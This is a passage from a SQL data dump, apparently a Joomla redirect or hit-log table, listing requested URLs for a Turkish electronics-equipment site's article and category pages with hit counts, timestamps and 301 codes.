00:00:00',301),(1877,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',3,0,'2014-08-08 08:50:20','0000-00-00 00:00:00',301),(1878,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',3,0,'2014-08-08 08:50:24','0000-00-00 00:00:00',301),(1879,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',4,0,'2014-08-08 08:50:27','0000-00-00 00:00:00',301),(1880,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',1,0,'2014-08-08 08:54:58','0000-00-00 00:00:00',301),(1881,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',4,0,'2014-08-08 08:55:12','0000-00-00 00:00:00',301),(1882,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',1,0,'2014-08-08 08:56:50','0000-00-00 00:00:00',301),(1883,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',3,0,'2014-08-08 08:56:58','0000-00-00 00:00:00',301),(1884,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',1,0,'2014-08-08 08:57:19','0000-00-00 00:00:00',301),(1885,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',2,0,'2014-08-08 08:57:33','0000-00-00 00:00:00',301),(1886,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',3,0,'2014-08-08 08:57:55','0000-00-00 00:00:00',301),(1887,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',5,0,'2014-08-08 08:58:12','0000-00-00 00:00:00',301),(1888,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',23,0,'2014-08-08 08:58:26','0000-00-00 00:00:00',301),(1889,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',1,0,'2014-08-08 08:59:44','0000-00-00 00:00:00',301),(1890,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',2,0,'2014-08-08 08:59:51','0000-00-00 00:00:00',301),(1891,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',1,0,'2014-08-08 08:59:56','0000-00-00 00:00:00',301),(1892,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default','','','',5,0,'2014-08-08 09:02:19','0000-00-00 00:00:00',301),(1893,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=&lang=en','','','',1,0,'2014-08-08 09:13:03','0000-00-00 00:00:00',301),(1894,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',2,0,'2014-08-08 09:16:19','0000-00-00 00:00:00',301),(1895,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',4,0,'2014-08-08 09:22:27','0000-00-00 00:00:00',301),(1896,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',3,0,'2014-08-08 09:37:51','0000-00-00 00:00:00',301),(1897,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',4,0,'2014-08-08 09:37:57','0000-00-00 00:00:00',301),(1898,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-08 09:43:52','0000-00-00 00:00:00',301),(1899,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',3,0,'2014-08-08 10:04:24','0000-00-00 00:00:00',301),(1900,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',10,0,'2014-08-08 10:05:41','0000-00-00 00:00:00',301),(1901,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',3,0,'2014-08-08 10:05:41','0000-00-00 00:00:00',301),(1902,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',1,0,'2014-08-08 10:08:29','0000-00-00 00:00:00',301),(1903,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',4,0,'2014-08-08 10:09:42','0000-00-00 00:00:00',301),(1904,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',1,0,'2014-08-08 10:09:56','0000-00-00 00:00:00',301),(1905,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',4,0,'2014-08-08 10:10:07','0000-00-00 00:00:00',301),(1906,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',3,0,'2014-08-08 10:13:39','0000-00-00 00:00:00',301),(1907,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=0&lang=en','','','',1,0,'2014-08-08 10:14:33','0000-00-00 00:00:00',301),(1908,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',6,0,'2014-08-08 10:14:48','0000-00-00 00:00:00',301),(1909,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',4,0,'2014-08-08 10:15:13','0000-00-00 00:00:00',301),(1910,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119','','','',5,0,'2014-08-08 10:16:27','0000-00-00 00:00:00',301),(1911,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',4,0,'2014-08-08 10:16:55','0000-00-00 00:00:00',301),(1912,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',5,0,'2014-08-08 10:18:05','0000-00-00 00:00:00',301),(1913,'http://www.3s-technologies.com.tr/index.php?view=section&id=6&Itemid=1&lang=tr','','','',1,0,'2014-08-08 10:18:06','0000-00-00 00:00:00',301),(1914,'http://www.3s-technologies.com.tr/index.php?view=contact&id=1&Itemid=65&lang=tr','','','',1,0,'2014-08-08 10:18:10','0000-00-00 00:00:00',301),(1915,'http://www.3s-technologies.com.tr/index.php?view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',1,0,'2014-08-08 10:18:15','0000-00-00 00:00:00',301),(1916,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',3,0,'2014-08-08 10:25:39','0000-00-00 00:00:00',301),(1917,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',2,0,'2014-08-08 10:43:33','0000-00-00 00:00:00',301),(1918,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',2,0,'2014-08-08 10:43:34','0000-00-00 00:00:00',301),(1919,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-08-08 10:47:09','0000-00-00 00:00:00',301),(1920,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',3,0,'2014-08-08 10:47:21','0000-00-00 00:00:00',301),(1921,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',2,0,'2014-08-08 10:57:32','0000-00-00 00:00:00',301),(1922,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',29,0,'2014-08-08 11:00:38','0000-00-00 00:00:00',301),(1923,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56','','','',1,0,'2014-08-08 11:03:55','0000-00-00 00:00:00',301),(1924,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',3,0,'2014-08-08 11:05:24','0000-00-00 00:00:00',301),(1925,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108','','','',1,0,'2014-08-08 11:08:48','0000-00-00 00:00:00',301),(1926,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=&lang=tr','','','',1,0,'2014-08-08 11:11:36','0000-00-00 00:00:00',301),(1927,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',2,0,'2014-08-08 11:19:10','0000-00-00 00:00:00',301),(1928,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',3,0,'2014-08-08 11:21:23','0000-00-00 00:00:00',301),(1929,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',6,0,'2014-08-08 11:23:10','0000-00-00 00:00:00',301),(1930,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',1,0,'2014-08-08 11:27:04','0000-00-00 00:00:00',301),(1931,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',5,0,'2014-08-08 11:29:12','0000-00-00 00:00:00',301),(1932,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',1,0,'2014-08-08 11:30:15','0000-00-00 00:00:00',301),(1933,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',3,0,'2014-08-08 11:40:20','0000-00-00 00:00:00',301),(1934,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',6,0,'2014-08-08 11:41:20','0000-00-00 00:00:00',301),(1935,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',3,0,'2014-08-08 11:45:07','0000-00-00 00:00:00',301),(1936,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',5,0,'2014-08-08 11:48:09','0000-00-00 00:00:00',301),(1937,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',2,0,'2014-08-08 11:49:31','0000-00-00 00:00:00',301),(1938,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28','','','',1,0,'2014-08-08 11:54:26','0000-00-00 00:00:00',301),(1939,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',2,0,'2014-08-08 11:55:21','0000-00-00 00:00:00',301),(1940,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',7,0,'2014-08-08 11:59:31','0000-00-00 00:00:00',301),(1941,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',14,0,'2014-08-08 12:09:24','0000-00-00 00:00:00',301),(1942,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',4,0,'2014-08-08 12:42:50','0000-00-00 00:00:00',301),(1943,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',6,0,'2014-08-08 12:45:40','0000-00-00 00:00:00',301),(1944,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',5,0,'2014-08-08 12:57:44','0000-00-00 00:00:00',301),(1945,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110','','','',3,0,'2014-08-08 12:59:23','0000-00-00 00:00:00',301),(1946,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',4,0,'2014-08-08 13:15:13','0000-00-00 00:00:00',301),(1947,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',4,0,'2014-08-08 13:16:33','0000-00-00 00:00:00',301),(1948,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',2,0,'2014-08-08 13:20:12','0000-00-00 00:00:00',301),(1949,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',5,0,'2014-08-08 13:21:23','0000-00-00 00:00:00',301),(1950,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',9,0,'2014-08-08 13:28:22','0000-00-00 00:00:00',301),(1951,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',9,0,'2014-08-08 13:47:26','0000-00-00 00:00:00',301),(1952,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',1,0,'2014-08-08 13:48:47','0000-00-00 00:00:00',301),(1953,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',9,0,'2014-08-08 14:02:55','0000-00-00 00:00:00',301),(1954,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',3,0,'2014-08-08 14:04:31','0000-00-00 00:00:00',301),(1955,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',10,0,'2014-08-08 14:08:39','0000-00-00 00:00:00',301),(1956,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',6,0,'2014-08-08 14:12:52','0000-00-00 00:00:00',301),(1957,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',7,0,'2014-08-08 14:24:39','0000-00-00 00:00:00',301),(1958,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',7,0,'2014-08-08 14:27:09','0000-00-00 00:00:00',301),(1959,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',5,0,'2014-08-08 14:32:01','0000-00-00 00:00:00',301),(1960,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',4,0,'2014-08-08 14:46:18','0000-00-00 00:00:00',301),(1961,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',8,0,'2014-08-08 15:05:23','0000-00-00 00:00:00',301),(1962,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147','','','',3,0,'2014-08-08 15:07:07','0000-00-00 00:00:00',301),(1963,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112','','','',3,0,'2014-08-08 15:08:40','0000-00-00 00:00:00',301),(1964,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',12,0,'2014-08-08 15:11:24','0000-00-00 00:00:00',301),(1965,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',6,0,'2014-08-08 15:15:06','0000-00-00 00:00:00',301),(1966,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',3,0,'2014-08-08 15:17:13','0000-00-00 00:00:00',301),(1967,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',8,0,'2014-08-08 15:27:19','0000-00-00 00:00:00',301),(1968,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162','','','',3,0,'2014-08-08 15:33:00','0000-00-00 00:00:00',301),(1969,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',3,0,'2014-08-08 15:44:18','0000-00-00 00:00:00',301),(1970,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',2,0,'2014-08-08 15:50:43','0000-00-00 00:00:00',301),(1971,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',5,0,'2014-08-08 15:51:30','0000-00-00 00:00:00',301),(1972,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133','','','',2,0,'2014-08-08 16:09:02','0000-00-00 00:00:00',301),(1973,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',7,0,'2014-08-08 16:12:27','0000-00-00 00:00:00',301),(1974,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',4,0,'2014-08-08 16:17:02','0000-00-00 00:00:00',301),(1975,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',15,0,'2014-08-08 16:21:05','0000-00-00 00:00:00',301),(1976,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',11,0,'2014-08-08 16:21:31','0000-00-00 00:00:00',301),(1977,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',2,0,'2014-08-08 16:29:19','0000-00-00 00:00:00',301),(1978,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',7,0,'2014-08-08 16:30:41','0000-00-00 00:00:00',301),(1979,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',3,0,'2014-08-08 16:31:29','0000-00-00 00:00:00',301),(1980,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',2,0,'2014-08-08 16:31:42','0000-00-00 00:00:00',301),(1981,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',15,0,'2014-08-08 16:32:09','0000-00-00 00:00:00',301),(1982,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103','','','',2,0,'2014-08-08 16:38:42','0000-00-00 00:00:00',301),(1983,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',34,0,'2014-08-08 16:50:12','0000-00-00 00:00:00',301),(1984,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',13,0,'2014-08-08 17:32:52','0000-00-00 00:00:00',301),(1985,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',7,0,'2014-08-08 17:38:09','0000-00-00 00:00:00',301),(1986,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default','','','',2,0,'2014-08-08 17:43:03','0000-00-00 00:00:00',301),(1987,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',9,0,'2014-08-08 17:45:38','0000-00-00 00:00:00',301),(1988,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',4,0,'2014-08-08 18:06:37','0000-00-00 00:00:00',301),(1989,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82','','','',1,0,'2014-08-08 18:07:04','0000-00-00 00:00:00',301),(1990,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',11,0,'2014-08-08 18:09:02','0000-00-00 00:00:00',301),(1991,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131','','','',3,0,'2014-08-08 18:21:03','0000-00-00 00:00:00',301),(1992,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',7,0,'2014-08-08 18:25:57','0000-00-00 00:00:00',301),(1993,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',1,0,'2014-08-08 18:58:02','0000-00-00 00:00:00',301),(1994,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',10,0,'2014-08-08 18:59:58','0000-00-00 00:00:00',301),(1995,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',6,0,'2014-08-08 19:06:16','0000-00-00 00:00:00',301),(1996,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-08-08 19:08:52','0000-00-00 00:00:00',301),(1997,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',2,0,'2014-08-08 19:09:02','0000-00-00 00:00:00',301),(1998,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default','','','',3,0,'2014-08-08 19:15:46','0000-00-00 00:00:00',301),(1999,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',2,0,'2014-08-08 19:23:02','0000-00-00 00:00:00',301),(2000,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',5,0,'2014-08-08 19:23:04','0000-00-00 00:00:00',301),(2001,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',12,0,'2014-08-08 19:24:21','0000-00-00 00:00:00',301),(2002,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',11,0,'2014-08-08 19:25:39','0000-00-00 00:00:00',301),(2003,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',4,0,'2014-08-08 19:26:32','0000-00-00 00:00:00',301),(2004,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',2,0,'2014-08-08 19:29:25','0000-00-00 00:00:00',301),(2005,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',7,0,'2014-08-08 19:29:50','0000-00-00 00:00:00',301),(2006,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',1,0,'2014-08-08 19:33:43','0000-00-00 00:00:00',301),(2007,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156','','','',2,0,'2014-08-08 19:33:45','0000-00-00 00:00:00',301),(2008,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',8,0,'2014-08-08 19:39:32','0000-00-00 00:00:00',301),(2009,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',2,0,'2014-08-08 20:10:08','0000-00-00 00:00:00',301),(2010,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',6,0,'2014-08-08 20:13:10','0000-00-00 00:00:00',301),(2011,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',10,0,'2014-08-08 20:18:23','0000-00-00 00:00:00',301),(2012,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',5,0,'2014-08-08 20:27:38','0000-00-00 00:00:00',301),(2013,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',25,0,'2014-08-08 20:32:22','0000-00-00 00:00:00',301),(2014,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',4,0,'2014-08-08 20:40:41','0000-00-00 00:00:00',301),(2015,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',8,0,'2014-08-08 20:41:29','0000-00-00 00:00:00',301),(2016,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',4,0,'2014-08-08 21:07:07','0000-00-00 00:00:00',301),(2017,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',7,0,'2014-08-08 